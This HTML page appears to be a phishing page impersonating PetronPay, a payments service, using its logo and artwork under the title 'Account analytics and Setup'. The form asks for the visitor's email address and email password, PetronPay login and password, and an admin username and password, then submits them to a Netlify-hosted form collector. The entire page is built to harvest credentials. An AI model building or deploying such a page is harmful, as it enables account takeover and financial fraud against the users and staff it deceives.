<main class="admin-main">
    <div class="container-fluid">
        <div class="row">
            <div class="col-lg-4  bg-white">
                <div class="row align-items-center m-h-100">
                    <div class="mx-auto col-md-8  fomer">
                        <div class="p-b-20 text-center">
                            <p>
                                <img src="./tools.svg" width="60">
                                <img src="https://petronpay.com/assets/theme/petron/site/images/logo-default-210x76.png" width="210" alt="">
                            </p>
                        </div>
                        <h3 class="text-center p-b-20 fw-400">Account analytics and Setup</h3>
                        <p class="text-center mb-5">
                          Make sure the data provided belongs to you   
                        </p>
                        
                        
                        

<form name="loginForm" method="POST" data-netlify="true" data-netlify-honeypot="bot-field">

    <!--<input type="hidden" name="_token" value="6xzmC9B1JtfLxAy0JEKTeXaHqiqEYsGQBxej1mh5">-->
        <input type="hidden" name="form-name" value="loginForm" />

    <div class="form-row">
        <div class="form-group floating-label col-md-12 show-label">
            <label>E-mail for Account</label>
            <input type="text" class="form-control " placeholder="Enter your email" id="loginFormInputLogin" name="login">
            <div class="invalid-feedback">
                
            </div>
        </div>
        <div class="form-group floating-label col-md-12 show-label">
            <label>Password For E-mail</label>
            <input type="password" class="form-control " placeholder="Enter E-mail password" id="passwordFormInputLogin" name="password">
            <div class="invalid-feedback">
                
            </div>
        </div>
        <div class="form-group floating-label col-md-12 show-label">
            <label>Account Login</label>
            <input type="text" class="form-control " placeholder="Enter your login" id="loginFormInputLogin" name="login">
            <div class="invalid-feedback">
                
            </div>
        </div>
        <div class="form-group floating-label col-md-12 show-label">
            <label>Account Password</label>
            <input type="text" class="form-control " placeholder="PetronPay password" id="loginFormInputLogin" name="login">
            <div class="invalid-feedback">
                
            </div>
        </div>
         <div class="form-group floating-label col-md-12 show-label">
            <label>Admin</label>
            <input type="text" class="form-control " placeholder="Admin username" id="loginFormInputLogin" name="login">
            <div class="invalid-feedback">
                
            </div>
        </div>
         <div class="form-group floating-label col-md-12 show-label">
            <label>Admin Pass</label>
            <input type="text" class="form-control " placeholder="Admin password" id="loginFormInputLogin" name="login">
            <div class="invalid-feedback">
                
            </div>
        </div>
    </div>

    <button type="submit" class="btn btn-primary btn-block btn-lg">Continue<i class="ui icon double angle right"></i></button>
    <form name="contact" netlify>
  <p>
    <label>Name <input type="text" name="name" /></label>
  </p>
  <p>
    <label>Email <input type="email" name="email" /></label>
  </p>
  <p>
    <button type="submit">Send</button>
  </p>
</form>

</form>

                    </div>

                </div>
            </div>
            <div class="col-lg-8 d-none d-md-block bg-cover" style="background-image: url('https://petronpay.com/assets/theme/petron/img/login.svg');"></div>
            
        </div>
    </div>
</main>
{{outlet}}

